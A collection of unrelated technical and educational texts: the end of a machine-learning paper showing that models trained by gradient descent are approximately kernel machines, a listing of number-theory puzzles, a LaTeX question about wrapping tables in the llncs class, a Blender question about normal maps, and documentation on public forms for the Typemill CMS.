$$\frac{dy}{dt} = \sum_{j=1}^{d} \frac{\partial y}{\partial w_j} \left(-\sum_{i=1}^{m} \frac{\partial L}{\partial y_i} \frac{\partial y_i}{\partial w_j}\right).$$
Rearranging terms:
$$\frac{dy}{dt} = -\sum_{i=1}^{m} \frac{\partial L}{\partial y_i} \sum_{j=1}^{d} \frac{\partial y}{\partial w_j} \frac{\partial y_i}{\partial w_j}.$$
Let $L'(y^*_i, y_i) = \partial L / \partial y_i$, the loss derivative for the $i$th output. Applying this and Definition 1:
$$\frac{dy}{dt} = -\sum_{i=1}^{m} L'(y^*_i, y_i)\, K^{g}_{f,w(t)}(x, x_i).$$
Let $y_0$ be the initial model, prior to gradient descent. Then for the final model $y$:
$$\lim_{\epsilon \to 0} y = y_0 - \int_{c(t)} \sum_{i=1}^{m} L'(y^*_i, y_i)\, K^{g}_{f,w(t)}(x, x_i)\, dt,$$
where $c(t)$ is the path taken by the parameters during gradient descent. Multiplying and dividing by $\int_{c(t)} K^{g}_{f,w(t)}(x, x_i)\, dt$:
$$\lim_{\epsilon \to 0} y = y_0 - \sum_{i=1}^{m} \left(\frac{\int_{c(t)} K^{g}_{f,w(t)}(x, x_i)\, L'(y^*_i, y_i)\, dt}{\int_{c(t)} K^{g}_{f,w(t)}(x, x_i)\, dt}\right) \int_{c(t)} K^{g}_{f,w(t)}(x, x_i)\, dt.$$
Let $\overline{L'}(y^*_i, y_i)$ denote the term in parentheses, the average loss derivative weighted by similarity to $x_i$. Applying this and Definition 2:
$$\lim_{\epsilon \to 0} y = y_0 - \sum_{i=1}^{m} \overline{L'}(y^*_i, y_i)\, K^{p}_{f,c}(x, x_i).$$
Thus
$$\lim_{\epsilon \to 0} y = \sum_{i=1}^{m} a_i K(x, x_i) + b,$$
with $a_i = -\overline{L'}(y^*_i, y_i)$, $K(x, x_i) = K^{p}_{f,c}(x, x_i)$, and $b = y_0$.
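As a numerical sanity check of the theorem (our own sketch, not from the paper): for a linear model $y = w \cdot x$ with squared loss, the tangent kernel is the constant dot product $x \cdot x'$, and each gradient descent step changes the prediction by exactly $-\epsilon \sum_i L'_i (x_i \cdot x)$, so the discrete analogue of the path-kernel expansion holds exactly at any finite learning rate, not just in the $\epsilon \to 0$ limit. The data, learning rate, and step count below are illustrative.

```python
import numpy as np

# Linear model y = w . x, squared loss.  Accumulate the per-step kernel
# contributions and compare with the directly trained model's prediction.
rng = np.random.default_rng(0)
X = rng.normal(size=(5, 3))       # 5 training inputs, 3 features
y_star = rng.normal(size=5)       # targets y*_i
w = rng.normal(size=3)            # initial parameters
x_query = rng.normal(size=3)      # query point

eps, steps = 1e-3, 2000
y0_query = w @ x_query            # initial model b = y_0(x)
kernel_sum = 0.0                  # accumulates sum_i a_i K(x, x_i)

for _ in range(steps):
    resid = X @ w - y_star                     # L'(y*_i, y_i) = y_i - y*_i
    kernel_sum -= eps * resid @ (X @ x_query)  # -eps * sum_i L'_i (x_i . x)
    w -= eps * X.T @ resid                     # gradient descent step

direct = w @ x_query              # prediction of the trained model
kernel_machine = y0_query + kernel_sum
print(abs(direct - kernel_machine))   # agrees to ~machine precision
```

For a nonlinear model the tangent kernel changes along the path and the equality only holds in the small-learning-rate limit, which is exactly what the theorem states.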
{remark}
This differs from typical kernel machines in that the $a_i$'s and $b$ depend on $x$. Nevertheless, the $a_i$'s play a role similar to the example weights in ordinary SVMs and the perceptron algorithm: examples that the loss is more sensitive to during learning have a higher weight. $b$ is simply the prior model, and the final model is thus the sum of the prior model and the model learned by gradient descent, with the query point entering the latter only through kernels. Since Theorem 2 applies to every $x$ as a query throughout gradient descent, the training data points also enter the model only through kernels (initial model aside).
{remark}
Theorem 2 can equally well be proved using the loss-weighted path kernel $K^{L}_{f,c}(x, x') = \int_{c(t)} L'(y^*, y)\, K^{g}_{f,w(t)}(x, x')\, dt$, in which case $a_i = -1$ for all $i$.
{remark}
In least-squares regression, $L'(y^*_i, y_i) = y_i - y^*_i$. When learning a classifier by minimizing cross-entropy, the standard practice in deep learning, the function to be estimated is the conditional probability of the class given the input, the loss is $L = -\sum_i \log y_i$, and the loss derivative for the $i$th output is $L'(y^*_i, y_i) = -1/y_i$. Similar expressions hold for modeling a joint distribution by minimizing negative log likelihood, with $y_i$ as the probability of the $i$th data point.
{remark}
The proof above is for batch gradient descent, which uses all training data points at each step. To extend it to stochastic gradient descent, which uses a subsample, it suffices to multiply each term in the summation over data points by an indicator function that is 1 if the $i$th data point is included in the subsample at time $t$ and 0 otherwise. The only change this causes in the result is that the path kernel and average loss derivative for a data point are now stochastic integrals. Based on previous results (Scieur et al., 2017), Theorem 2 or a similar result seems likely to also apply to further variants of gradient descent, but proving this remains an open problem.
For linear models, the path kernel reduces to the dot product of the data points. It is well known that a single-layer perceptron is a kernel machine, with the dot product as the kernel (Aizerman et al., 1964). Our result can be viewed as a generalization of this to multilayer perceptrons and other models. It is also related to Lippmann et al.’s proof that Hopfield networks, a predecessor of many current deep architectures, are equivalent to the nearest-neighbor algorithm, a predecessor of kernel machines, with Hamming distance as the comparison function (Lippmann et al., 1987).
The result assumes that the learning rate is sufficiently small for the trajectory of the weights during gradient descent to be well approximated by a smooth curve. This is standard in the analysis of gradient descent, and is also generally a good approximation in practice, since the learning rate has to be quite small in order to avoid divergence (Goodfellow et al., 2016). Nevertheless, it remains an open question to what extent models learned by gradient descent can still be approximated by kernel machines outside of this regime.
3 Discussion
A notable disadvantage of deep networks is their lack of interpretability (Zhang and Zhu, 2018). Knowing that they are effectively path kernel machines greatly ameliorates this. In particular, the weights of a deep network have a straightforward interpretation as a superposition of the training examples in gradient space, where each example is represented by the corresponding gradient of the model. Fig. 2 illustrates this. One well-studied approach to interpreting the output of deep networks involves looking for training instances that are close to the query in Euclidean or some other simple space (Ribeiro et al., 2016). Path kernels tell us what the exact space for these comparisons should be, and how it relates to the model’s predictions.
Experimentally, deep networks and kernel machines often perform more similarly than would be expected based on their mathematical formulation (Brendel and Bethge, 2019). Even when they generalize well, deep networks often appear to memorize and replay whole training instances (Zhang et al., 2017; Devlin et al., 2015). The fact that deep networks are in fact kernel machines helps explain both of these observations. It also sheds light on the surprising brittleness of deep models, whose performance can degrade rapidly as the query point moves away from the nearest training instance (Szegedy et al., 2014), since this is what is expected of kernel estimators in high-dimensional spaces (Hardle et al., 2004).
Perhaps the most significant implication of our result for deep learning is that it casts doubt on the common view that it works by automatically discovering new representations of the data, in contrast with other machine learning methods, which rely on predefined features (Bengio et al., 2013). As it turns out, deep learning also relies on such features, namely the gradients of a predefined function, and uses them for prediction via dot products in feature space, like other kernel machines. All that gradient descent does is select features from this space for use in the kernel. If gradient descent is limited in its ability to learn representations, better methods for this purpose are a key research direction. Current nonlinear alternatives include predicate invention (Muggleton and Buntine, 1988) and latent variable discovery in graphical models (Elidan et al., 2000). Techniques like structure mapping (Gentner, 1983), crossover (Holland, 1975) and predictive coding (Rao and Ballard, 1999) may also be relevant. Ultimately, however, we may need entirely new approaches to solve this crucial but extremely difficult problem.
Our result also has significant consequences on the kernel machine side. Path kernels provide a new and very flexible way to incorporate knowledge of the target function into the kernel. Previously, it was only possible to do so in a weak sense, via generic notions of what makes two data points similar. The extensive knowledge that has been encoded into deep architectures by applied researchers, and is crucial to the success of deep learning, can now be ported directly to kernel machines. For example, kernels with translation invariance or selective attention are directly obtainable from the architecture of, respectively, convolutional neural networks (LeCun et al., 1998) or transformers (Vaswani et al., 2017).
A key property of path kernels is that they combat the curse of dimensionality by incorporating derivatives into the kernel: two data points are similar if the candidate function’s derivatives at them are similar, rather than if they are close in the input space. This can greatly improve kernel machines’ ability to approximate highly variable functions (Bengio et al., 2005). It also means that points that are far in Euclidean space can be close in gradient space, potentially improving the ability to model complex functions. (For example, the maxima of a sine wave are all close in gradient space, even though they can be arbitrarily far apart in the input space.)
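The sine-wave observation in the parenthetical above can be checked directly with an illustrative one-parameter model $f_w(x) = \sin(wx)$ (our example, not the paper's): the derivative with respect to $w$ is $x\cos(wx)$, which vanishes at every maximum, so all maxima share the same gradient-space coordinate no matter how far apart they are in input space.

```python
import numpy as np

# Gradient-space closeness for f_w(x) = sin(w * x): df/dw = x * cos(w * x)
# is zero at every maximum (w * x = pi/2 + 2*pi*k), so maxima that are
# arbitrarily far apart in x coincide in gradient space.
w = 1.0
maxima = np.array([np.pi / 2 + 2 * np.pi * k for k in range(4)])
grads = maxima * np.cos(w * maxima)   # df/dw evaluated at each maximum
print(np.max(np.abs(grads)))          # essentially zero for all maxima
```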
Most significantly, however, learning path kernel machines via gradient descent largely overcomes the scalability bottlenecks that have long limited the applicability of kernel methods to large data sets. Computing and storing the Gram matrix at learning time, with its quadratic cost in the number of examples, is no longer required. (The Gram matrix is the matrix of applications of the kernel to all pairs of training examples.) Separately storing and matching (a subset of) the training examples at query time is also no longer necessary, since they are effectively all stored and matched simultaneously via their superposition in the model parameters. The storage space and matching time are independent of the number of examples. (Interestingly, superposition has been hypothesized to play a key role in combatting the combinatorial explosion in visual cognition (Arathorn, 2002), and is also essential to the efficiency of quantum computing (Nielsen and Chuang, 2000) and radio communication (Carlson and Grilly, 2009).) Further, the same specialized hardware that has given deep learning a decisive edge in scaling up to large data (Raina et al., 2009) can now be used for kernel machines as well.
The significance of our result extends beyond deep networks and kernel machines. In its light, gradient descent can be viewed as a boosting algorithm, with tangent kernel machines as the weak learner and path kernel machines as the strong learner obtained by boosting it (Freund and Schapire, 1997). In each round of boosting, the examples are weighted by the corresponding loss derivatives. It is easily seen that each round (gradient descent step) decreases the loss, as required. The weight of the model at a given round is the learning rate for that step, which can be constant or the result of a line search (Boyd and Vandenberghe, 2004). In the latter case gradient descent is similar to gradient boosting (Mason et al., 1999).
Another consequence of our result is that every probabilistic model learned by gradient descent, including Bayesian networks (Koller and Friedman, 2009), is a form of kernel density estimation (Parzen, 1962). The result also implies that the solution of every convex learning problem is a kernel machine, irrespective of the optimization method used, since, being unique, it is necessarily the solution obtained by gradient descent. It is an open question whether the result can be extended to nonconvex models learned by non-gradient-based techniques, including constrained (Bertsekas, 1982) and combinatorial optimization (Papadimitriou and Steiglitz, 1982).
The results in this paper suggest a number of research directions. For example, viewing gradient descent as a method for learning path kernel machines may provide new paths for improving it. Conversely, gradient descent is not necessarily the only way to form superpositions of examples that are useful for prediction. The key question is how to optimize the tradeoff between accurately capturing the target function and minimizing the computational cost of storing and matching the examples in the superposition.
\acks
This research was partly funded by ONR grant N00014-18-1-2826. Thanks to Léon Bottou and Simon Du for feedback on a draft of this paper.
References
1. M. A. Aizerman, E. M. Braverman, and L. I. Rozonoer. Theoretical foundations of the potential function method in pattern recognition learning. Autom. & Remote Contr., 25:821–837, 1964.
2. Luigi Ambrosio, Nicola Gigli, and Giuseppe Savaré. Gradient Flows: In Metric Spaces and in the Space of Probability Measures. Birkhäuser, Basel, 2nd edition, 2008.
3. D. W. Arathorn. Map-Seeking Circuits in Visual Cognition: A Computational Mechanism for Biological and Machine Vision. Stanford Univ. Press, Stanford, CA, 2002.
4. Y. Bengio, O. Delalleau, and N. L. Roux. The curse of highly variable functions for local kernel machines. Adv. Neural Inf. Proc. Sys., 18:107–114, 2005.
5. Y. Bengio, A. Courville, and P. Vincent. Representation learning: A review and new perspectives. IEEE Trans. Patt. An. & Mach. Intell., 35:1798–1828, 2013.
6. P. Bertsekas. Constrained Optimization and Lagrange Multiplier Methods. Academic Press, Cambridge, MA, 1982.
7. S. Boyd and L. Vandenberghe. Convex Optimization. Cambridge University Press, Cambridge, UK, 2004.
8. W. Brendel and M. Bethge. Approximating CNNs with bag-of-local-features models works surprisingly well on ImageNet. In Proc. Int. Conf. Learn. Repr., 2019.
9. A. B. Carlson and P. B. Grilly. Communication Systems: An Introduction to Signals and Noise in Electrical Communication. McGraw-Hill, New York, 5th edition, 2009.
10. N. Cohen, O. Sharir, and A. Shashua. On the expressive power of deep learning: A tensor analysis. In Proc. Ann. Conf. Learn. Th., pages 698–728, 2016.
11. C. Cortes, M. Mohri, and A. Rostamizadeh. Learning non-linear combinations of kernels. Adv. Neural Inf. Proc. Sys., 22:396–404, 2009.
12. O. Delalleau and Y. Bengio. Shallow vs. deep sum-product networks. Adv. Neural Inf. Proc. Sys., 24:666–674, 2011.
13. J. Devlin, H. Cheng, H. Fang, S. Gupta, L. Deng, X. He, G. Zweig, and M. Mitchell. Language models for image captioning: The quirks and what works. In Proc. Ann. Meet. Assoc. Comp. Ling., pages 100–105, 2015.
14. G. Elidan, N. Lotner, N. Friedman, and D. Koller. Discovering hidden variables: A structure-based approach. Adv. Neural Inf. Proc. Sys., 13:479–485, 2000.
15. Y. Freund and R. Schapire. A decision-theoretic generalization of on-line learning and an application to boosting. J. Comp. & Sys. Sci., 55:119–139, 1997.
16. D. Gentner. Structure-mapping: A theoretical framework for analogy. Cog. Sci., 7:155–170, 1983.
17. I. Goodfellow, Y. Bengio, and A. Courville. Deep Learning. MIT Press, Cambridge, MA, 2016.
18. W. Hardle, M. Müller, and A. Werwatz. Nonparametric and Semiparametric Models. Springer, Berlin, 2004.
19. J. H. Holland. Adaptation in Natural and Artificial Systems. Univ. Michigan Press, Ann Arbor, MI, 1975.
20. A. Jacot, F. Gabriel, and C. Hongler. Neural tangent kernel: Convergence and generalization in neural networks. Adv. Neural Inf. Proc. Sys., 31:8571–8580, 2018.
21. D. Koller and N. Friedman. Probabilistic Graphical Models: Principles and Techniques. MIT Press, Cambridge, MA, 2009.
22. Y. LeCun, L. Bottou, Y. Bengio, and P. Haffner. Gradient-based learning applied to document recognition. Proc. IEEE, 86:2278–2324, 1998.
23. R. Lippmann, B. Gold, and M. Malpass. A comparison of Hamming and Hopfield neural networks for pattern classification. Technical Report 769, MIT Lincoln Lab, Lexington, MA, 1987.
24. L. Mason, J. Baxter, P. L. Bartlett, and M. R. Frean. Boosting algorithms as gradient descent. Adv. Neural Inf. Proc. Sys,, 12:512–518, 1999.
25. S. Muggleton and W. Buntine. Machine invention of first-order predicates by inverting resolution. In Proc. Int. Conf. Mach. Learn., pages 339–352, 1988.
26. M. A. Nielsen and I. L. Chuang. Quantum Computation and Quantum Information. Cambridge Univ. Press, Cambridge, UK, 2000.
27. C. Papadimitriou and K. Steiglitz. Combinatorial Optimization: Algorithms and Complexity. Prentice-Hall, Upper Saddle River, NJ, 1982.
28. E. Parzen. On estimation of a probability density function and mode. Ann. Math. Stat., 33:1065–1076, 1962.
29. T. Poggio and F. Girosi. Regularization algorithms for learning that are equivalent to multilayer networks. Science, 247:978–982, 1990.
30. R. Raina, A. Madhavan, and A. Y. Ng. Large-scale deep unsupervised learning using graphics processors. In Proc. Int. Conf. Mach. Learn., pages 873–880, 2009.
31. R. P. N. Rao and D. H. Ballard. Predictive coding in the visual cortex: A functional interpretation of some extra-classical receptive field effects. Nature Neurosci., 2:79–87, 1999.
32. M. T. Ribeiro, S. Singh, and C. Guestrin. “Why should I trust you?”: Explaining the predictions of any classifier. In Proc. Int. Conf. Knowl. Disc. & Data Mining, pages 1135–1144, 2016.
33. D. E. Rumelhart, G. E. Hinton, and R. J. Williams. Learning representations by back-propagating errors. Nature, 323:533–536, 1986.
34. B. Schölkopf and A. J. Smola. Learning with Kernels: Support Vector Machines, Regularization, Optimization, and Beyond. MIT Press, Cambridge, MA, 2002.
35. D. Scieur, V. Roulet, F. Bach, and A. d’Aspremont. Integration methods and optimization algorithms. Adv. Neural Inf. Proc. Sys., 30:1109–1118, 2017.
36. C. Szegedy, W. Zaremba, I. Sutskever, J. Bruna, D. Erhan, I. Goodfellow, and R. Fergus. Intriguing properties of neural networks. In Proc. Int. Conf. Learn. Repr., 2014.
37. A. Vaswani, N. Shazeer, N. Parmar, J. Uszkoreit, L. Jones, N. Aidan, L. Kaiser, and I. Polosukhin. Attention is all you need. Adv. Neural Inf. Proc. Sys., 30:5998–6008, 2017.
38. C. Zhang, S. Bengio, M. Hardt, B. Recht, and O. Vinyals. Understanding deep learning requires rethinking generalization. In Proc. Int. Conf. Learn. Repr., 2017.
39. Q. Zhang and S.-C. Zhu. Visual interpretability for deep learning: A survey. Front. Inf. Tech. & Elec. Eng., 19:27–39, 2018.
|
|
Resources tagged with Factors and multiples similar to Magic Caterpillars:
There are 92 results
LCM Sudoku
Stage: 4 Challenge Level:
Here is a Sudoku with a difference! Use information about lowest common multiples to help you solve it.
LCM Sudoku II
Stage: 3, 4 and 5 Challenge Level:
You are given the Lowest Common Multiples of sets of digits. Find the digits and then solve the Sudoku.
Multiplication Equation Sudoku
Stage: 4 and 5 Challenge Level:
The puzzle can be solved by finding the values of the unknown digits (all indicated by asterisks) in the squares of the $9\times9$ grid.
Product Sudoku
Stage: 3, 4 and 5 Challenge Level:
The clues for this Sudoku are the product of the numbers in adjacent squares.
Transposition Cipher
Stage: 3 and 4 Challenge Level:
Can you work out what size grid you need to read our secret message?
Product Sudoku 2
Stage: 3 and 4 Challenge Level:
Given the products of diagonally opposite cells - can you complete this Sudoku?
Substitution Transposed
Stage: 3 and 4 Challenge Level:
Substitution and Transposition all in one! How fiendish can these codes get?
Substitution Cipher
Stage: 3 and 4 Challenge Level:
Find the frequency distribution for ordinary English, and use it to help you crack the code.
Remainder
Stage: 3 Challenge Level:
What is the remainder when 2^2002 is divided by 7? What happens with different powers of 2?
14 Divisors
Stage: 3 Challenge Level:
What is the smallest number with exactly 14 divisors?
Cuboids
Stage: 3 Challenge Level:
Find a cuboid (with edges of integer values) that has a surface area of exactly 100 square units. Is there more than one? Can you find them all?
The Remainders Game
Stage: 2 and 3 Challenge Level:
A game that tests your understanding of remainders.
X Marks the Spot
Stage: 3 Challenge Level:
When the number x 1 x x x is multiplied by 417 this gives the answer 9 x x x 0 5 7. Find the missing digits, each of which is represented by an "x" .
GOT IT Now
Stage: 2 and 3 Challenge Level:
For this challenge, you'll need to play Got It! Can you explain the strategy for winning this game with any target?
Factorial
Stage: 4 Challenge Level:
How many zeros are there at the end of the number which is the product of first hundred positive integers?
AB Search
Stage: 3 Challenge Level:
The five digit number A679B, in base ten, is divisible by 72. What are the values of A and B?
A First Product Sudoku
Stage: 3 Challenge Level:
Given the products of adjacent cells, can you complete this Sudoku?
Data Chunks
Stage: 4 Challenge Level:
Data is sent in chunks of two different sizes - a yellow chunk has 5 characters and a blue chunk has 9 characters. A data slot of size 31 cannot be exactly filled with a combination of yellow and. . . .
Stage: 3 Challenge Level:
A mathematician goes into a supermarket and buys four items. Using a calculator she multiplies the cost instead of adding them. How can her answer be the same as the total at the till?
Squaresearch
Stage: 4 Challenge Level:
Consider numbers of the form un = 1! + 2! + 3! +...+n!. How many such numbers are perfect squares?
Factors and Multiples Game
Stage: 2, 3 and 4 Challenge Level:
A game in which players take it in turns to choose a number. Can you block your opponent?
Shifting Times Tables
Stage: 3 Challenge Level:
Can you find a way to identify times tables after they have been shifted up?
Stage: 3 Challenge Level:
Make a set of numbers that use all the digits from 1 to 9, once and once only. Add them up. The result is divisible by 9. Add each of the digits in the new number. What is their sum? Now try some. . . .
Remainders
Stage: 3 Challenge Level:
I'm thinking of a number. When my number is divided by 5 the remainder is 4. When my number is divided by 3 the remainder is 2. Can you find my number?
Reverse to Order
Stage: 3 Challenge Level:
Take any two digit number, for example 58. What do you have to do to reverse the order of the digits? Can you find a rule for reversing the order of digits for any two digit number?
Different by One
Stage: 4 Challenge Level:
Make a line of green and a line of yellow rods so that the lines differ in length by one (a white rod)
Three Times Seven
Stage: 3 Challenge Level:
A three digit number abc is always divisible by 7 when 2a+3b+c is divisible by 7. Why?
What a Joke
Stage: 4 Challenge Level:
Each letter represents a different positive digit AHHAAH / JOKE = HA What are the values of each of the letters?
Factoring Factorials
Stage: 3 Challenge Level:
Find the highest power of 11 that will divide into 1000! exactly.
N000ughty Thoughts
Stage: 4 Challenge Level:
Factorial one hundred (written 100!) has 24 noughts when written in full, and 1000! has 249 noughts. Convince yourself that this is true. Perhaps your methodology will help you find the. . . .
Ben's Game
Stage: 3 Challenge Level:
Ben passed a third of his counters to Jack, Jack passed a quarter of his counters to Emma and Emma passed a fifth of her counters to Ben. After this they all had the same number of counters.
Inclusion Exclusion
Stage: 3 Challenge Level:
How many integers between 1 and 1200 are NOT multiples of any of the numbers 2, 3 or 5?
Thirty Six Exactly
Stage: 3 Challenge Level:
The number 12 = 2^2 × 3 has 6 factors. What is the smallest natural number with exactly 36 factors?
Hot Pursuit
Stage: 3 Challenge Level:
The sum of the first 'n' natural numbers is a 3 digit number in which all the digits are the same. How many numbers have been summed?
American Billions
Stage: 3 Challenge Level:
Play the divisibility game to create numbers in which the first two digits make a number divisible by 2, the first three digits make a number divisible by 3...
Even So
Stage: 3 Challenge Level:
Find some triples of whole numbers a, b and c such that a^2 + b^2 + c^2 is a multiple of 4. Is it necessarily the case that a, b and c must all be even? If so, can you explain why?
Eminit
Stage: 3 Challenge Level:
The number 8888...88M9999...99 is divisible by 7 and it starts with the digit 8 repeated 50 times and ends with the digit 9 repeated 50 times. What is the value of the digit M?
Oh! Hidden Inside?
Stage: 3 Challenge Level:
Find the number which has 8 divisors, such that the product of the divisors is 331776.
Phew I'm Factored
Stage: 4 Challenge Level:
Explore the factors of the numbers which are written as 10101 in different number bases. Prove that the numbers 10201, 11011 and 10101 are composite in any base.
How Old Are the Children?
Stage: 3 Challenge Level:
A student in a maths class was trying to get some information from her teacher. She was given some clues and then the teacher ended by saying, "Well, how old are they?"
Two Much
Stage: 3 Challenge Level:
Explain why the arithmetic sequence 1, 14, 27, 40, ... contains many terms of the form 222...2 where only the digit 2 appears.
Factor Track
Stage: 2 and 3 Challenge Level:
Factor track is not a race but a game of skill. The idea is to go round the track in as few moves as possible, keeping to the rules.
Stage: 3 Challenge Level:
List any 3 numbers. It is always possible to find a subset of adjacent numbers that add up to a multiple of 3. Can you explain why and prove it?
Helen's Conjecture
Stage: 3 Challenge Level:
Helen made the conjecture that "every multiple of six has more factors than the two numbers either side of it". Is this conjecture true?
Special Sums and Products
Stage: 3 Challenge Level:
Find some examples of pairs of numbers such that their sum is a factor of their product. eg. 4 + 12 = 16 and 4 × 12 = 48 and 16 is a factor of 48.
Gaxinta
Stage: 3 Challenge Level:
A number N is divisible by 10, 90, 98 and 882 but it is NOT divisible by 50 or 270 or 686 or 1764. It is also known that N is a factor of 9261000. What is N?
Expenses
Stage: 4 Challenge Level:
What is the largest number which, when divided into 1905, 2587, 3951, 7020 and 8725 in turn, leaves the same remainder each time?
Dozens
Stage: 3 Challenge Level:
Do you know a quick way to check if a number is a multiple of two? How about three, four or six?
Diggits
Stage: 3 Challenge Level:
Can you find what the last two digits of the number $4^{1999}$ are?
|
|
# How to use wraptable with llncs format?
I have to use llncs format: example here.
I'm trying to wrap a simple table. Here's my syntax:
this is some sample text, blah blah blah
\begin{wraptable}%{r}{0.35\textwidth}
\begin{tabular}{cc}
\multicolumn{2}{c}{\textbf{table title here}}\\
\toprule
\textbf{A} & b\\
\textbf{C} & d \\
\textbf{E} & f\\
\bottomrule
\label{tab}
\end{tabular}
\end{wraptable}
more text here blah blah lhabladfl blha blha blah
but this only wraps one line around the table:
I'm using llncs format which breaks if I use \usepackage{wrapfig}, so currently I'm not importing that package.
Also, if I use \begin{wraptable}{r}{0.35\textwidth}, then the arguments r0.35\textwidth appear as literal text in the paper just before the table!
Anyone know how to fix this problem?
• llncs is compatible with wrapfig, see my answer below. If you still experience problems, please post a complete document, starting with \documentclass and ending with \end{document}. Something may be wrong, but it is not the combination llncs+wrapfig. – gernot Mar 18 '17 at 10:22
llncs doesn't appear to define an environment called wraptable, so did you not get an error? The image you show is consistent with just putting a tabular in the paragraph (acting as an oversized letter in the middle of the text): the text isn't wrapping at all; the table is just in the main paragraph flow.
Never ignore TeX errors, the pdf produced after an error is at best useful as a debugging aid, TeX's error recovery is not intended to produce usable output.
• The example link I was following added many packages as had I. Not sure which packages were causing problems, but i started from scratch adding only the packages i needed and it worked w/o errors. I did have to add \usepackage{wrapfig}. – travelingbones Mar 19 '17 at 14:36
I don't see why the llncs format breaks when using wrapfig.
\documentclass{llncs}
\usepackage{wrapfig,booktabs}
\usepackage{lipsum}
\begin{document}
\begin{wraptable}{r}{0.35\textwidth}
\begin{tabular}{cc}
\multicolumn{2}{c}{\textbf{table title here}}\\
\toprule
\textbf{A} & b\\
\textbf{C} & d\\
\textbf{E} & f\\
\bottomrule
\end{tabular}
\end{wraptable}
\lipsum[1]
\end{document}
|
|
# How to get edges and normal map from 3D model?
I want to extract edges and normal maps from the 3d model using freestyle. However, my rendered normal map looks like this
But it should look like this.
There are two problems: there's no blue channel in the rendered normal map, and there is a shaded area which is black even though a lamp exists there.
I think I should render matcap in shading properties, but I have no idea how to render like matcap.
• The thing you want is called a world normal map (global normal map), and depending on how the normal vector is stored in the map, the color can be black in certain cases. You should specify your question a little more, regarding what exactly you want. – Hikariztw May 15 '19 at 5:01
Normal maps in Blender store a normal as follows:
• Red maps from (0 - 255) to X (-1.0 - 1.0)
• Green maps from (0 - 255) to Y (-1.0 - 1.0)
• Blue maps from (0 - 255) to Z (0.0 - 1.0)
Since normals all point towards a viewer, negative Z values are not stored (they would be invisible anyway). In Blender we store a full blue range, although some other implementations also map blue colors (128 - 255) to (0.0 - 1.0). The latter convention is used in “Doom 3” for example.
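As a small illustration of the channel mapping described above (a sketch; the helper name, the 8-bit assumption, and the Doom 3 variant flag are mine, not Blender API calls):

```python
# Decode one pixel of an 8-bit tangent-space normal map using the
# channel mapping described above.
def decode_normal(r, g, b, doom3=False):
    x = r / 255.0 * 2.0 - 1.0            # red:   0..255 -> X in [-1, 1]
    y = g / 255.0 * 2.0 - 1.0            # green: 0..255 -> Y in [-1, 1]
    if doom3:
        z = max(0.0, (b - 128) / 127.0)  # blue: 128..255 -> Z in [0, 1]
    else:
        z = b / 255.0                    # blue:   0..255 -> Z in [0, 1]
    return x, y, z

print(decode_normal(128, 128, 255))  # roughly (0, 0, 1): the flat "straight up" normal
```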
If you want to achieve the default Blender normal map definition (where Z starts from 0.0 instead of -1.0), you need to define what happens when -1 < Z < 0.
Below are two examples of how to calculate it in the node editor:
Is the first one you are asking for?
|
|
# Quantisation commutes with reduction at discrete series representations of semisimple groups
@article{Hochs2007QuantisationCW,
title={Quantisation commutes with reduction at discrete series representations of semisimple groups},
author={P. Hochs},
}
|
|
# Math Help - ∫(sin⁻¹x)²
1. ## ∫(sin⁻¹x)²
$\int (\sin^{-1}x)^2\,dx$
the only problem is I have to do it via the method of substitution; I'm not supposed to use integration by parts
2. Let's use integration by parts.
Let $u = [\arcsin(x)]^2$ and $dv = dx$, so that
$du = \frac{2\arcsin(x)}{\sqrt{1 - x^2}}\,dx$ and $v = x$.
Which gives us:
$x[\arcsin(x)]^2 - \int \frac{2x\arcsin(x)}{\sqrt{1 - x^2}}\,dx$
Using integration by parts again, let $u = \arcsin(x)$ and $dv = \frac{2x}{\sqrt{1 - x^2}}\,dx$, so that
$du = \frac{dx}{\sqrt{1 - x^2}}$ and $v = -2\sqrt{1 - x^2}$.
$x[\arcsin(x)]^2 - \left[-2\arcsin(x)\sqrt{1 - x^2} + \int \frac{2\sqrt{1 - x^2}}{\sqrt{1 - x^2}}\,dx\right]$
$= x[\arcsin(x)]^2 + 2\arcsin(x)\sqrt{1 - x^2} - \int 2\,dx$
So,
$x[\arcsin(x)]^2 + 2\arcsin(x)\sqrt{1 - x^2} - 2x + C$
3. By substitution:
let $t = \arcsin x$
so, $\sin t = x$
$dt = \frac{dx}{\sqrt{1 - x^2}}$
$dx = \sqrt{1 - \sin^2 t}\,dt = \cos t\,dt$
$\int (\arcsin x)^2\,dx = \int t^2 \cos t\,dt$
I'll let you finish this (by parts).
I guess there is no escape from integration by parts...
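For completeness, a sketch of the remaining steps: integrating $\int t^2\cos t\,dt$ by parts twice gives

$\int t^2\cos t\,dt = t^2\sin t + 2t\cos t - 2\sin t + C$

and back-substituting $t = \arcsin x$, $\sin t = x$, $\cos t = \sqrt{1-x^2}$ yields

$\int (\arcsin x)^2\,dx = x(\arcsin x)^2 + 2\sqrt{1-x^2}\,\arcsin x - 2x + C,$

which you can confirm by differentiating.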
5. I guess the same; I hope the question is just misprinted in the substitution exercise.
Thanks everyone for your time.
|
|
# Public Forms
edit
Public forms, like contact or newsletter subscription forms, are a common requirement for websites, but often a hassle for developers. Typemill makes your life much easier, because all you need is a plugin with some form definitions in YAML and some business logic in PHP. All the complicated stuff like generating the front-end forms, validating form data, and adding spam security or CSRF protection is done by Typemill automatically.
## #Form Definitions
Public forms are defined in a separate block of the YAML-configuration-file of your plugin. Public forms can use the exact same field definitions as theme- and plugin-forms. Look at this example:
forms:
fields:
myfield:
type: text
label: 'I am a textfield'
required: true
public:
fields:
mypublicfield:
type: text
label: 'I am a textfield'
required: true
You probably want to customize the labels and text hints of your public forms, so that the admin can localize them for example. This can be done by a simple reference like this:
forms:
fields:
mail_label:
type: text
label: 'Label of Mail-Input-Field'
placeholder: 'Localize label here'
required: true
public:
fields:
mail:
type: text
label: mail_label
required: true
The label of the public mail field has a reference to the mail_label field of the admin forms. This way, the admin can overwrite the label for the mail-field of the public form in the plugin-settings. You can add references like this for three fieldtypes:
• label
• help
• description
Typemill has a pretty straight-forward approach to logic for public forms: If a user sends data with a public form, then Typemill will check the data and redirect the user back to the original page. If the data is valid, then Typemill will store the data before it redirects the user. If the data is not valid, and contains errors, then Typemill will add error messages before it redirects the user.
In your plugin, you can handle both the frontend form AND the incoming form data with two handy methods. Both methods expect the name of the plugin as a variable:
• $this->getFormdata('pluginName'): checks and returns input data from a form.
• $this->generateForm('pluginName'): generates the frontend form.
If the user has submitted a form and the form data is valid, then the method $this->getFormdata will return the data, and you can process it. You always have to check for existing form data first. If no form data exists, then you can generate the frontend form and display it to the user. So your code will always look similar to this:
# check if form data have been stored
